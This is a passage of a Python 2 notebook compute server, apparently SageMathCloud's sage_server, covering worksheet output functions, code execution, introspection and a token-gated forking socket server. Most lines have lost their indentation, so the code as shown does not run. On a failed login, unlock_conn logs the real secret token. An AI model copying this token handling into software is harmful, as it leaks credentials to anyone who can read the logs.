This will only work if the file is not deleted; however, arbitrarily
large files can be streamed this way.
This function creates an output message {file:...}; if the user saves
a worksheet containing this message, then any referenced blobs are made
permanent in the database.
        The uuid is based on the SHA-1 hash of the file content (it is computed using the
        function sage_server.uuidsha1). Any two files with the same content have the
        same SHA-1 hash.
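        EXAMPLES (illustrative)::
            salvus.file('plot.png')                    # show the file inline
            url = salvus.file('data.csv', show=False)  # str(url) is a /blobs/... link
            salvus.file('movie.mp4', raw=True)         # stream directly from the project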
"""
filename = unicode8(filename)
if raw:
info = self.project_info()
path = os.path.abspath(filename)
home = os.environ[u'HOME'] + u'/'
if path.startswith(home):
path = path[len(home):]
else:
raise ValueError(u"can only send raw files in your home directory")
url = os.path.join(u'/',info['base_url'].strip('/'), info['project_id'], u'raw', path.lstrip('/'))
if show:
self._flush_stdio()
self._send_output(id=self._id, once=once, file={'filename':filename, 'url':url, 'show':show, 'text':text}, events=events, done=done)
return
else:
return TemporaryURL(url=url, ttl=0)
file_uuid = self._conn.send_file(filename)
mesg = None
while mesg is None:
self.message_queue.recv()
for i, (typ, m) in enumerate(self.message_queue.queue):
if typ == 'json' and m.get('event') == 'save_blob' and m.get('sha1') == file_uuid:
mesg = m
del self.message_queue[i]
break
if 'error' in mesg:
raise RuntimeError("error saving blob -- %s"%mesg['error'])
self._flush_stdio()
self._send_output(id=self._id, once=once, file={'filename':filename, 'uuid':file_uuid, 'show':show, 'text':text}, events=events, done=done)
if not show:
info = self.project_info()
url = u"%s/blobs/%s?uuid=%s"%(info['base_url'], filename, file_uuid)
if download:
url += u'?download'
return TemporaryURL(url=url, ttl=mesg.get('ttl',0))
def default_mode(self, mode=None):
"""
Set the default mode for cell evaluation. This is equivalent
to putting %mode at the top of any cell that does not start
with %. Use salvus.default_mode() to return the current mode.
Use salvus.default_mode("") to have no default mode.
This is implemented using salvus.cell_prefix.
"""
if mode is None:
return Salvus._default_mode
Salvus._default_mode = mode
if mode == "sage":
self.cell_prefix("")
else:
self.cell_prefix("%" + mode)
def cell_prefix(self, prefix=None):
"""
Make it so that the given prefix code is textually
        prepended to the input before evaluating any cell, unless
the first character of the cell is a %.
To append code at the end, use cell_postfix.
INPUT:
- ``prefix`` -- None (to return prefix) or a string ("" to disable)
EXAMPLES:
Make it so every cell is timed:
salvus.cell_prefix('%time')
Make it so cells are typeset using latex, and latex comments are allowed even
as the first line.
salvus.cell_prefix('%latex')
%sage salvus.cell_prefix('')
Evaluate each cell using GP (Pari) and display the time it took:
salvus.cell_prefix('%time\n%gp')
%sage salvus.cell_prefix('') # back to normal
"""
if prefix is None:
return Salvus._prefix
else:
Salvus._prefix = prefix
def cell_postfix(self, postfix=None):
"""
Make it so that the given code is textually
appended to the input before evaluating a cell.
To prepend code at the beginning, use cell_prefix.
INPUT:
- ``postfix`` -- None (to return postfix) or a string ("" to disable)
EXAMPLES:
Print memory usage after evaluating each cell:
salvus.cell_postfix('print("%s MB used"%int(get_memory_usage()))')
Return to normal
            salvus.cell_postfix('')
"""
if postfix is None:
return Salvus._postfix
else:
Salvus._postfix = postfix
def execute(self, code, namespace=None, preparse=True, locals=None):
def reload_attached_files_if_mod_smc():
# see sage/src/sage/repl/attach.py reload_attached_files_if_modified()
from sage.repl.attach import modified_file_iterator
for filename, mtime in modified_file_iterator():
basename = os.path.basename(filename)
timestr = time.strftime('%T', mtime)
print('### reloading attached file {0} modified at {1} ###'.format(basename, timestr))
from sage_salvus import load
load(filename)
if namespace is None:
namespace = self.namespace
# clear pylab figure (takes a few microseconds)
if pylab is not None:
pylab.clf()
#code = sage_parsing.strip_leading_prompts(code) # broken -- wrong on "def foo(x):\n print(x)"
blocks = sage_parsing.divide_into_blocks(code)
for start, stop, block in blocks:
if preparse:
block = sage_parsing.preparse_code(block)
sys.stdout.reset(); sys.stderr.reset()
try:
b = block.rstrip()
if b.endswith('??'):
p = sage_parsing.introspect(block,
namespace=namespace, preparse=False)
self.code(source = p['result'], mode = "python")
elif b.endswith('?'):
p = sage_parsing.introspect(block, namespace=namespace, preparse=False)
self.code(source = p['result'], mode = "text/x-rst")
else:
reload_attached_files_if_mod_smc()
exec compile(block+'\n', '', 'single') in namespace, locals
sys.stdout.flush()
sys.stderr.flush()
except:
sys.stdout.flush()
sys.stderr.write('Error in lines %s-%s\n'%(start+1, stop+1))
traceback.print_exc()
sys.stderr.flush()
break
def execute_with_code_decorators(self, code_decorators, code, preparse=True, namespace=None, locals=None):
"""
salvus.execute_with_code_decorators is used when evaluating
code blocks that are set to any non-default code_decorator.
"""
import sage # used below as a code decorator
if isinstance(code_decorators, (str, unicode)):
code_decorators = [code_decorators]
if preparse:
code_decorators = map(sage_parsing.preparse_code, code_decorators)
code_decorators = [eval(code_decorator, self.namespace) for code_decorator in code_decorators]
# The code itself may want to know exactly what code decorators are in effect.
# For example, r.eval can do extra things when being used as a decorator.
self.code_decorators = code_decorators
for i, code_decorator in enumerate(code_decorators):
# eval is for backward compatibility
if not hasattr(code_decorator, 'eval') and hasattr(code_decorator, 'before'):
code_decorators[i] = code_decorator.before(code)
for code_decorator in reversed(code_decorators):
if hasattr(code_decorator, 'eval'): # eval is for backward compatibility
print code_decorator.eval(code, locals=self.namespace),
code = ''
elif code_decorator is sage:
# special case -- the sage module (i.e., %sage) should do nothing.
pass
else:
code = code_decorator(code)
if code is None:
code = ''
if code != '' and isinstance(code, (str, unicode)):
self.execute(code, preparse=preparse, namespace=namespace, locals=locals)
for code_decorator in code_decorators:
if not hasattr(code_decorator, 'eval') and hasattr(code_decorator, 'after'):
code_decorator.after(code)
def html(self, html, done=False, once=None):
"""
Display html in the output stream.
EXAMPLE:
salvus.html("<b>Hi</b>")
"""
self._flush_stdio()
self._send_output(html=unicode8(html), id=self._id, done=done, once=once)
def md(self, md, done=False, once=None):
"""
Display markdown in the output stream.
EXAMPLE:
salvus.md("**Hi**")
"""
self._flush_stdio()
self._send_output(md=unicode8(md), id=self._id, done=done, once=once)
def pdf(self, filename, **kwds):
sage_salvus.show_pdf(filename, **kwds)
def tex(self, obj, display=False, done=False, once=None, **kwds):
"""
Display obj nicely using TeX rendering.
INPUT:
- obj -- latex string or object that is automatically be converted to TeX
- display -- (default: False); if True, typeset as display math (so centered, etc.)
"""
self._flush_stdio()
tex = obj if isinstance(obj, str) else self.namespace['latex'](obj, **kwds)
self._send_output(tex={'tex':tex, 'display':display}, id=self._id, done=done, once=once)
return self
def start_executing(self):
self._send_output(done=False, id=self._id)
def clear(self, done=False):
self._send_output(clear=True, id=self._id, done=done)
def delete_last_output(self, done=False):
self._send_output(delete_last=True, id=self._id, done=done)
def stdout(self, output, done=False, once=None):
"""
Send the string output (or unicode8(output) if output is not a
string) to the standard output stream of the compute cell.
INPUT:
- output -- string or object
"""
stdout = output if isinstance(output, (str, unicode)) else unicode8(output)
self._send_output(stdout=stdout, done=done, id=self._id, once=once)
return self
def stderr(self, output, done=False, once=None):
"""
Send the string output (or unicode8(output) if output is not a
string) to the standard error stream of the compute cell.
INPUT:
- output -- string or object
"""
stderr = output if isinstance(output, (str, unicode)) else unicode8(output)
self._send_output(stderr=stderr, done=done, id=self._id, once=once)
return self
def code(self, source, # actual source code
mode = None, # the syntax highlight codemirror mode
filename = None, # path of file it is contained in (if applicable)
lineno = -1, # line number where source starts (0-based)
done=False, once=None):
"""
Send a code message, which is to be rendered as code by the client, with
appropriate syntax highlighting, maybe a link to open the source file, etc.
"""
source = source if isinstance(source, (str, unicode)) else unicode8(source)
code = {'source' : source,
'filename' : filename,
'lineno' : int(lineno),
'mode' : mode}
self._send_output(code=code, done=done, id=self._id, once=once)
return self
def _execute_interact(self, id, vals):
if id not in sage_salvus.interacts:
print("(Evaluate this cell to use this interact.)")
#raise RuntimeError("Error: No interact with id %s"%id)
else:
sage_salvus.interacts[id](vals)
def interact(self, f, done=False, once=None, **kwds):
I = sage_salvus.InteractCell(f, **kwds)
self._flush_stdio()
self._send_output(interact = I.jsonable(), id=self._id, done=done, once=once)
return sage_salvus.InteractFunction(I)
def javascript(self, code, once=False, coffeescript=False, done=False, obj=None):
"""
Execute the given Javascript code as part of the output
stream. This same code will be executed (at exactly this
point in the output stream) every time the worksheet is
rendered.
See the docs for the top-level javascript function for more details.
INPUT:
- code -- a string
        - once -- boolean (default: False); if True the Javascript is
only executed once, not every time the cell is loaded. This
is what you would use if you call salvus.stdout, etc. Use
once=False, e.g., if you are using javascript to make a DOM
element draggable (say). WARNING: If once=True, then the
javascript is likely to get executed before other output to
a given cell is even rendered.
- coffeescript -- boolean (default: False); if True, the input
code is first converted from CoffeeScript to Javascript.
At least the following Javascript objects are defined in the
scope in which the code is evaluated::
- cell -- jQuery wrapper around the current compute cell
- salvus.stdout, salvus.stderr, salvus.html, salvus.tex -- all
allow you to write additional output to the cell
- worksheet - jQuery wrapper around the current worksheet DOM object
- obj -- the optional obj argument, which is passed via JSON serialization
"""
if obj is None:
obj = {}
self._send_output(javascript={'code':code, 'coffeescript':coffeescript}, id=self._id, done=done, obj=obj, once=once)
def coffeescript(self, *args, **kwds):
"""
This is the same as salvus.javascript, but with coffeescript=True.
See the docs for the top-level javascript function for more details.
"""
kwds['coffeescript'] = True
self.javascript(*args, **kwds)
def raw_input(self, prompt='', default='', placeholder='', input_width=None, label_width=None, done=False, type=None): # done is ignored here
self._flush_stdio()
m = {'prompt':unicode8(prompt)}
if input_width is not None:
m['input_width'] = unicode8(input_width)
if label_width is not None:
m['label_width'] = unicode8(label_width)
if default:
m['value'] = unicode8(default)
if placeholder:
m['placeholder'] = unicode8(placeholder)
self._send_output(raw_input=m, id=self._id)
typ, mesg = self.message_queue.next_mesg()
#log("raw_input got message typ='%s', mesg='%s'"%(typ, mesg))
if typ == 'json' and mesg['event'] == 'sage_raw_input':
# everything worked out perfectly
self.delete_last_output()
m['value'] = mesg['value'] # as unicode!
m['submitted'] = True
self._send_output(raw_input=m, id=self._id)
value = mesg['value']
if type is not None:
if type == 'sage':
value = sage_salvus.sage_eval(value)
else:
try:
value = type(value)
except TypeError:
# Some things in Sage are clueless about unicode for some reason...
# Let's at least try, in case the unicode can convert to a string.
value = type(str(value))
return value
else:
raise KeyboardInterrupt("raw_input interrupted by another action: event='%s' (expected 'sage_raw_input')"%mesg['event'])
def _check_component(self, component):
if component not in ['input', 'output']:
raise ValueError("component must be 'input' or 'output'")
def hide(self, component):
"""
Hide the given component ('input' or 'output') of the cell.
"""
self._check_component(component)
self._send_output(self._id, hide=component)
def show(self, component):
"""
Show the given component ('input' or 'output') of the cell.
"""
self._check_component(component)
self._send_output(self._id, show=component)
def notify(self, **kwds):
"""
Display a graphical notification using the pnotify Javascript library.
INPUTS:
- `title: false` - The notice's title.
- `title_escape: false` - Whether to escape the content of the title. (Not allow HTML.)
- `text: false` - The notice's text.
- `text_escape: false` - Whether to escape the content of the text. (Not allow HTML.)
- `styling: "bootstrap"` - What styling classes to use. (Can be either jqueryui or bootstrap.)
- `addclass: ""` - Additional classes to be added to the notice. (For custom styling.)
- `cornerclass: ""` - Class to be added to the notice for corner styling.
- `nonblock: false` - Create a non-blocking notice. It lets the user click elements underneath it.
- `nonblock_opacity: .2` - The opacity of the notice (if it's non-blocking) when the mouse is over it.
- `history: true` - Display a pull down menu to redisplay previous notices, and place the notice in the history.
- `auto_display: true` - Display the notice when it is created. Turn this off to add notifications to the history without displaying them.
- `width: "300px"` - Width of the notice.
- `min_height: "16px"` - Minimum height of the notice. It will expand to fit content.
- `type: "notice"` - Type of the notice. "notice", "info", "success", or "error".
- `icon: true` - Set icon to true to use the default icon for the selected style/type, false for no icon, or a string for your own icon class.
- `animation: "fade"` - The animation to use when displaying and hiding the notice. "none", "show", "fade", and "slide" are built in to jQuery. Others require jQuery UI. Use an object with effect_in and effect_out to use different effects.
- `animate_speed: "slow"` - Speed at which the notice animates in and out. "slow", "def" or "normal", "fast" or number of milliseconds.
- `opacity: 1` - Opacity of the notice.
- `shadow: true` - Display a drop shadow.
- `closer: true` - Provide a button for the user to manually close the notice.
- `closer_hover: true` - Only show the closer button on hover.
- `sticker: true` - Provide a button for the user to manually stick the notice.
- `sticker_hover: true` - Only show the sticker button on hover.
- `hide: true` - After a delay, remove the notice.
- `delay: 8000` - Delay in milliseconds before the notice is removed.
- `mouse_reset: true` - Reset the hide timer if the mouse moves over the notice.
- `remove: true` - Remove the notice's elements from the DOM after it is removed.
- `insert_brs: true` - Change new lines to br tags.
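        EXAMPLE (illustrative)::
            salvus.notify(title='Build finished', text='All tests passed', type='success')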
"""
obj = {}
for k, v in kwds.iteritems():
obj[k] = sage_salvus.jsonable(v)
self.javascript("$.pnotify(obj)", once=True, obj=obj)
def execute_javascript(self, code, coffeescript=False, obj=None):
"""
Tell the browser to execute javascript. Basically the same as
salvus.javascript with once=True (the default), except this
isn't tied to a particular cell. There is a worksheet object
defined in the scope of the evaluation.
See the docs for the top-level javascript function for more details.
"""
self._conn.send_json(message.execute_javascript(code,
coffeescript=coffeescript, obj=json.dumps(obj,separators=(',', ':'))))
def execute_coffeescript(self, *args, **kwds):
"""
This is the same as salvus.execute_javascript, but with coffeescript=True.
See the docs for the top-level javascript function for more details.
"""
kwds['coffeescript'] = True
self.execute_javascript(*args, **kwds)
def _cython(self, filename, **opts):
"""
Return module obtained by compiling the Cython code in the
given file.
INPUT:
- filename -- name of a Cython file
- all other options are passed to sage.misc.cython.cython unchanged,
except for use_cache which defaults to True (instead of False)
OUTPUT:
- a module
"""
if 'use_cache' not in opts:
opts['use_cache'] = True
import sage.misc.cython
modname, path = sage.misc.cython.cython(filename, **opts)
import sys
try:
sys.path.insert(0,path)
module = __import__(modname)
finally:
del sys.path[0]
return module
def _import_code(self, content, **opts):
while True:
py_file_base = uuid().replace('-','_')
if not os.path.exists(py_file_base + '.py'):
break
try:
open(py_file_base+'.py', 'w').write(content)
import sys
try:
sys.path.insert(0, os.path.abspath('.'))
mod = __import__(py_file_base)
finally:
del sys.path[0]
finally:
os.unlink(py_file_base+'.py')
os.unlink(py_file_base+'.pyc')
return mod
def _sage(self, filename, **opts):
import sage.misc.preparser
content = "from sage.all import *\n" + sage.misc.preparser.preparse_file(open(filename).read())
return self._import_code(content, **opts)
def _spy(self, filename, **opts):
import sage.misc.preparser
content = "from sage.all import Integer, RealNumber, PolynomialRing\n" + sage.misc.preparser.preparse_file(open(filename).read())
return self._import_code(content, **opts)
def _py(self, filename, **opts):
return __import__(filename)
def require(self, filename, **opts):
if not os.path.exists(filename):
raise ValueError("file '%s' must exist"%filename)
base,ext = os.path.splitext(filename)
if ext == '.pyx' or ext == '.spyx':
return self._cython(filename, **opts)
if ext == ".sage":
return self._sage(filename, **opts)
if ext == ".spy":
return self._spy(filename, **opts)
if ext == ".py":
return self._py(filename, **opts)
raise NotImplementedError("require file of type %s not implemented"%ext)
def typeset_mode(self, on=True):
sage_salvus.typeset_mode(on)
def project_info(self):
"""
Return a dictionary with information about the project in which this code is running.
EXAMPLES::
sage: salvus.project_info()
{"stdout":"{u'project_id': u'...', u'location': {u'username': u'teaAuZ9M', u'path': u'.', u'host': u'localhost', u'port': 22}, u'base_url': u'/...'}\n"}
"""
return INFO
Salvus.pdf.__func__.__doc__ = sage_salvus.show_pdf.__doc__
Salvus.raw_input.__func__.__doc__ = sage_salvus.raw_input.__doc__
Salvus.clear.__func__.__doc__ = sage_salvus.clear.__doc__
Salvus.delete_last_output.__func__.__doc__ = sage_salvus.delete_last_output.__doc__
def execute(conn, id, code, data, cell_id, preparse, message_queue):
salvus = Salvus(conn=conn, id=id, data=data, message_queue=message_queue, cell_id=cell_id)
#salvus.start_executing() # with our new mainly client-side execution this isn't needed; not doing this makes evaluation roundtrip around 100ms instead of 200ms too, which is a major win.
try:
# initialize the salvus output streams
streams = (sys.stdout, sys.stderr)
sys.stdout = BufferedOutputStream(salvus.stdout)
sys.stderr = BufferedOutputStream(salvus.stderr)
try:
# initialize more salvus functionality
sage_salvus.set_salvus(salvus)
namespace['sage_salvus'] = sage_salvus
except:
traceback.print_exc()
if salvus._prefix:
if not code.startswith("%"):
code = salvus._prefix + '\n' + code
if salvus._postfix:
code += '\n' + salvus._postfix
salvus.execute(code, namespace=namespace, preparse=preparse)
finally:
# there must be exactly one done message, unless salvus._done is False.
if sys.stderr._buf:
if sys.stdout._buf:
sys.stdout.flush()
sys.stderr.flush(done=salvus._done)
else:
sys.stdout.flush(done=salvus._done)
(sys.stdout, sys.stderr) = streams
def drop_privileges(id, home, transient, username):
gid = id
uid = id
if transient:
os.chown(home, uid, gid)
os.setgid(gid)
os.setuid(uid)
os.environ['DOT_SAGE'] = home
mpl = os.environ['MPLCONFIGDIR']
os.environ['MPLCONFIGDIR'] = home + mpl[5:]
os.environ['HOME'] = home
os.environ['IPYTHON_DIR'] = home
os.environ['USERNAME'] = username
os.environ['USER'] = username
os.chdir(home)
# Monkey patch the Sage library and anything else that does not
# deal well with changing user. This sucks, but it is work that
# simply must be done because we're not importing the library from
# scratch (which would take a long time).
import sage.misc.misc
sage.misc.misc.DOT_SAGE = home + '/.sage/'
class MessageQueue(list):
def __init__(self, conn):
self.queue = []
self.conn = conn
def __repr__(self):
return "Sage Server Message Queue"
def __getitem__(self, i):
return self.queue[i]
def __delitem__(self, i):
del self.queue[i]
def next_mesg(self):
"""
Remove oldest message from the queue and return it.
If the queue is empty, wait for a message to arrive
and return it (does not place it in the queue).
"""
if self.queue:
return self.queue.pop()
else:
return self.conn.recv()
def recv(self):
"""
Wait until one message is received and enqueue it.
Also returns the mesg.
"""
mesg = self.conn.recv()
self.queue.insert(0,mesg)
return mesg
def session(conn):
"""
This is run by the child process that is forked off on each new
connection. It drops privileges, then handles the complete
compute session.
INPUT:
- ``conn`` -- the TCP connection
"""
mq = MessageQueue(conn)
pid = os.getpid()
# seed the random number generator(s)
import sage.all; sage.all.set_random_seed()
import random; random.seed(sage.all.initial_seed())
# get_memory_usage is not aware of being forked...
import sage.misc.getusage
sage.misc.getusage._proc_status = "/proc/%s/status"%os.getpid()
cnt = 0
while True:
try:
typ, mesg = mq.next_mesg()
#print('INFO:child%s: received message "%s"'%(pid, mesg))
log("handling message ", truncate_text(unicode8(mesg), 400))
event = mesg['event']
if event == 'terminate_session':
return
elif event == 'execute_code':
try:
execute(conn = conn,
id = mesg['id'],
code = mesg['code'],
data = mesg.get('data',None),
cell_id = mesg.get('cell_id',None),
preparse = mesg.get('preparse',True),
message_queue = mq)
except Exception as err:
log("ERROR -- exception raised '%s' when executing '%s'"%(err, mesg['code']))
elif event == 'introspect':
import sys
try:
# check for introspect from jupyter cell
prefix = Salvus._default_mode
if 'top' in mesg:
top = mesg['top']
log('introspect cell top line %s'%top)
if top.startswith("%"):
prefix = top[1:]
try:
# see if prefix is the name of a jupyter kernel function
# to qualify, prefix should be the name of a function
# and that function has free variables "i_am_a_jupyter_client" and "kn"
jkfn = namespace[prefix]
jupyter_client_index = jkfn.func_code.co_freevars.index("i_am_a_jupyter_client")
jkix = jkfn.func_code.co_freevars.index("kn") # e.g. 3
jkname = jkfn.func_closure[jkix].cell_contents # e.g. "python2"
# consider also checking for jkname in list of jupyter kernels
log("jupyter introspect %s: %s"%(prefix, jkname)) # e.g. "p2", "python2"
jupyter_introspect(conn=conn,
id=mesg['id'],
line=mesg['line'],
preparse=mesg.get('preparse', True),
jkfn=jkfn)
except:
# non-jupyter introspection
introspect(conn=conn, id=mesg['id'], line=mesg['line'], preparse=mesg.get('preparse', True))
except:
pass
else:
raise RuntimeError("invalid message '%s'"%mesg)
except:
# When hub connection dies, loop goes crazy.
# Unfortunately, just catching SIGINT doesn't seem to
# work, and leads to random exits during a
            # session. However, when the connection dies, 10000 iterations
# happen almost instantly. Ugly, but it works.
cnt += 1
if cnt > 10000:
sys.exit(0)
else:
pass
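# For reference, a minimal message the dispatch loop above understands might
# look like this (field values are made up for illustration):
#   {'event': 'execute_code', 'id': 0, 'code': '2+2', 'preparse': True}
# 'terminate_session' and 'introspect' events use the same dict shape.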
def jupyter_introspect(conn, id, line, preparse, jkfn):
import jupyter_client
from Queue import Empty
try:
salvus = Salvus(conn=conn, id=id)
kcix = jkfn.func_code.co_freevars.index("kc")
kc = jkfn.func_closure[kcix].cell_contents
msg_id = kc.complete(line)
shell = kc.shell_channel
iopub = kc.iopub_channel
# handle iopub responses
while True:
try:
msg = iopub.get_msg(timeout = 1)
msg_type = msg['msg_type']
content = msg['content']
except Empty:
# shouldn't happen
log("jupyter iopub channel empty")
break
if msg['parent_header'].get('msg_id') != msg_id:
continue
log("jupyter iopub recv %s %s"%(msg_type, str(content)))
if msg_type == 'status' and content['execution_state'] == 'idle':
break
# handle shell responses
while True:
try:
msg = shell.get_msg(timeout = 10)
msg_type = msg['msg_type']
content = msg['content']
except:
# shouldn't happen
log("jupyter shell channel empty")
break
if msg['parent_header'].get('msg_id') != msg_id:
continue
log("jupyter shell recv %s %s"%(msg_type, str(content)))
if msg_type == 'complete_reply' and content['status'] == 'ok':
# jupyter kernel returns matches like "xyz.append" and smc wants just "append"
matches = content['matches']
offset = content['cursor_end'] - content['cursor_start']
completions = [s[offset:] for s in matches]
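                # worked example (hypothetical values): if line='xyz.app', the
                # kernel may reply matches=['xyz.append'], cursor_start=0,
                # cursor_end=7; then offset=7, completions=['end'], and the
                # target sent below is line[-7:] == 'xyz.app'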
mesg = message.introspect_completions(id=id, completions=completions, target=line[-offset:])
conn.send_json(mesg)
break
except:
log("jupyter completion exception: %s"%sys.exc_info()[0])
def introspect(conn, id, line, preparse):
salvus = Salvus(conn=conn, id=id) # so salvus.[tab] works -- note that Salvus(...) modifies namespace.
z = sage_parsing.introspect(line, namespace=namespace, preparse=preparse)
    if z['get_completions']:
        mesg = message.introspect_completions(id=id, completions=z['result'], target=z['target'])
    elif z['get_help']:
        mesg = message.introspect_docstring(id=id, docstring=z['result'], target=z['expr'])
    elif z['get_source']:
        mesg = message.introspect_source_code(id=id, source_code=z['result'], target=z['expr'])
    else:
        return  # nothing recognized to introspect; avoid sending an unbound mesg
    conn.send_json(mesg)
def handle_session_term(signum, frame):
while True:
try:
pid, exit_status = os.waitpid(-1, os.WNOHANG)
except:
return
if not pid: return
secret_token = None
secret_token_path = os.path.join(os.environ['SMC'], 'secret_token')
def unlock_conn(conn):
global secret_token
if secret_token is None:
        try:
            secret_token = open(secret_token_path).read().strip()
        except:
            conn.send('n')
            conn.send("Unable to accept connection, since Sage server doesn't yet know the secret token; unable to read from '%s'"%secret_token_path)
            conn.close()
            return False  # without this, len(secret_token) below would raise on None
n = len(secret_token)
token = ''
while len(token) < n:
token += conn.recv(n)
if token != secret_token[:len(token)]:
break # definitely not right -- don't try anymore
if token != secret_token:
log("token='%s'; secret_token='%s'"%(token, secret_token))
conn.send('n') # no -- invalid login
conn.send("Invalid secret token.")
conn.close()
return False
else:
conn.send('y') # yes -- valid login
return True
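# The client side of this handshake (sketch, not part of this file): open a
# TCP connection, write the shared secret verbatim, then read one byte --
# 'y' means the server accepted the token, 'n' means it refused, e.g.
#   sock.send(secret_token); ok = (sock.recv(1) == 'y')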
def serve_connection(conn):
global PID
PID = os.getpid()
# First the client *must* send the secret shared token. If they
# don't, we return (and the connection will have been destroyed by
# unlock_conn).
log("Serving a connection")
log("Waiting for client to unlock the connection...")
# TODO -- put in a timeout (?)
if not unlock_conn(conn):
log("Client failed to unlock connection. Dumping them.")
return
log("Connection unlocked.")
try:
conn = ConnectionJSON(conn)
typ, mesg = conn.recv()
log("Received message %s"%mesg)
except Exception as err:
log("Error receiving message: %s (connection terminated)"%str(err))
raise
if mesg['event'] == 'send_signal':
if mesg['pid'] == 0:
log("invalid signal mesg (pid=0)")
else:
log("Sending a signal")
os.kill(mesg['pid'], mesg['signal'])
return
if mesg['event'] != 'start_session':
log("Received an unknown message event = %s; terminating session."%mesg['event'])
return
log("Starting a session")
desc = message.session_description(os.getpid())
log("child sending session description back: %s"%desc)
conn.send_json(desc)
session(conn=conn)
def serve(port, host, extra_imports=False):
#log.info('opening connection on port %s', port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# check for children that have finished every few seconds, so
# we don't end up with zombies.
s.settimeout(5)
s.bind((host, port))
log('Sage server %s:%s'%(host, port))
# Enabling the following signal completely breaks subprocess pexpect in many cases, which is
# obviously totally unacceptable.
#signal.signal(signal.SIGCHLD, handle_session_term)
def init_library():
tm = time.time()
log("pre-importing the sage library...")
# FOR testing purposes.
##log("fake 40 second pause to slow things down for testing....")
##time.sleep(40)
##log("done with pause")
# Monkey patching interact using the new and improved Salvus
# implementation of interact.
import sagenb.notebook.interact
sagenb.notebook.interact.interact = sage_salvus.interact
# Actually import sage now. This must happen after the interact
# import because of library interacts.
log("import sage...")
import sage.all
log("imported sage.")
# Monkey patch the html command.
import sage.interacts.library
sage.all.html = sage.misc.html.html = sage.interacts.library.html = sage_salvus.html
# Set a useful figsize default; the matplotlib one is not notebook friendly.
import sage.plot.graphics
sage.plot.graphics.Graphics.SHOW_OPTIONS['figsize']=[8,4]
# Monkey patch latex.eval, so that %latex works in worksheets
sage.misc.latex.latex.eval = sage_salvus.latex0
# Plot, integrate, etc., -- so startup time of worksheets is minimal.
cmds = ['from sage.all import *',
'from sage.calculus.predefined import x',
'import pylab']
if extra_imports:
cmds.extend(['import scipy',
'import sympy',
"plot(sin).save('%s/a.png'%os.environ['SMC'], figsize=2)",
'integrate(sin(x**2),x)'])
tm0 = time.time()
for cmd in cmds:
log(cmd)
exec cmd in namespace
global pylab
pylab = namespace['pylab'] # used for clearing
log('imported sage library and other components in %s seconds'%(time.time() - tm))
for k,v in sage_salvus.interact_functions.iteritems():
namespace[k] = sagenb.notebook.interact.__dict__[k] = v
namespace['_salvus_parsing'] = sage_parsing
for name in ['coffeescript', 'javascript', 'time', 'timeit', 'capture', 'cython',
'script', 'python', 'python3', 'perl', 'ruby', 'sh', 'prun', 'show', 'auto',
'hide', 'hideall', 'cell', 'fork', 'exercise', 'dynamic', 'var','jupyter',
'reset', 'restore', 'md', 'load', 'attach', 'runfile', 'typeset_mode', 'default_mode',
'sage_chat', 'fortran', 'magics', 'go', 'julia', 'pandoc', 'wiki', 'plot3d_using_matplotlib',
'mediawiki', 'help', 'raw_input', 'clear', 'delete_last_output', 'sage_eval']:
namespace[name] = getattr(sage_salvus, name)
namespace['sage_server'] = sys.modules[__name__] # http://stackoverflow.com/questions/1676835/python-how-do-i-get-a-reference-to-a-module-inside-the-module-itself
# alias pretty_print_default to typeset_mode, since sagenb has/uses that.
namespace['pretty_print_default'] = namespace['typeset_mode']
# and monkey patch it
sage.misc.latex.pretty_print_default = namespace['pretty_print_default']
sage_salvus.default_namespace = dict(namespace)
log("setup namespace with extra functions")
# Sage's pretty_print and view are both ancient and a mess
sage.all.pretty_print = sage.misc.latex.pretty_print = namespace['pretty_print'] = namespace['view'] = namespace['show']
# this way client code can tell it is running as a Sage Worksheet.
namespace['__SAGEWS__'] = True
log("Initialize sage library.")
init_library()
t = time.time()
s.listen(128)
i = 0
children = {}
log("Starting server listening for connections")
try:
while True:
i += 1
#print i, time.time()-t, 'cps: ', int(i/(time.time()-t))
# do not use log.info(...) in the server loop; threads = race conditions that hang server every so often!!
try:
                if children:
                    for pid in list(children.keys()):
                        if os.waitpid(pid, os.WNOHANG) != (0,0):
                            log("subprocess %s terminated, closing connection"%pid)
                            # close this child's stored connection -- 'conn' at this
                            # point is the most recently accepted socket, not this child's
                            children.pop(pid).close()
try:
conn, addr = s.accept()
log("Accepted a connection from", addr)
except:
# this will happen periodically since we did s.settimeout above, so
# that we wait for children above periodically.
continue
except socket.error, msg:
continue
child_pid = os.fork()
if child_pid: # parent
log("forked off child with pid %s to handle this connection"%child_pid)
children[child_pid] = conn
            else:
                # child
                global PID
                PID = os.getpid()
                log("child process, will now serve this new connection")
                serve_connection(conn)
                os._exit(0)  # ensure the child never falls back into the accept loop
# end while
except Exception as err:
log("Error taking connection: ", err)
traceback.print_exc(file=sys.stdout)
#log.error("error: %s %s", type(err), str(err))
finally:
log("closing socket")
#s.shutdown(0)
s.close()
def run_server(port, host, pidfile, logfile=None):
global LOGFILE
if logfile:
LOGFILE = logfile
if pidfile:
open(pidfile,'w').write(str(os.getpid()))
log("run_server: port=%s, host=%s, pidfile='%s', logfile='%s'"%(port, host, pidfile, LOGFILE))
try:
serve(port, host)
finally:
if pidfile:
os.unlink(pidfile)
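# Typical direct use (hypothetical paths; normally the __main__ block below
# drives this):
#   run_server(port=6000, host='127.0.0.1', pidfile='/tmp/sage_server.pid',
#              logfile='/tmp/sage_server.log')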
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Run Sage server")
parser.add_argument("-p", dest="port", type=int, default=0,
help="port to listen on (default: 0); 0 = automatically allocated; saved to $SMC/data/sage_server.port")
parser.add_argument("-l", dest='log_level', type=str, default='INFO',
help="log level (default: INFO) useful options include WARNING and DEBUG")
parser.add_argument("-d", dest="daemon", default=False, action="store_const", const=True,
help="daemon mode (default: False)")
parser.add_argument("--host", dest="host", type=str, default='127.0.0.1',
help="host interface to bind to -- default is 127.0.0.1")
parser.add_argument("--pidfile", dest="pidfile", type=str, default='',
help="store pid in this file")
parser.add_argument("--logfile", dest="logfile", type=str, default='',
help="store log in this file (default: '' = don't log to a file)")
parser.add_argument("-c", dest="client", default=False, action="store_const", const=True,
help="run in test client mode number 1 (command line)")
parser.add_argument("--hostname", dest="hostname", type=str, default='',
help="hostname to connect to in client mode")
parser.add_argument("--portfile", dest="portfile", type=str, default='',
help="write port to this file")
args = parser.parse_args()
if args.daemon and not args.pidfile:
print("%s: must specify pidfile in daemon mode" % sys.argv[0])
sys.exit(1)
if args.log_level:
pass
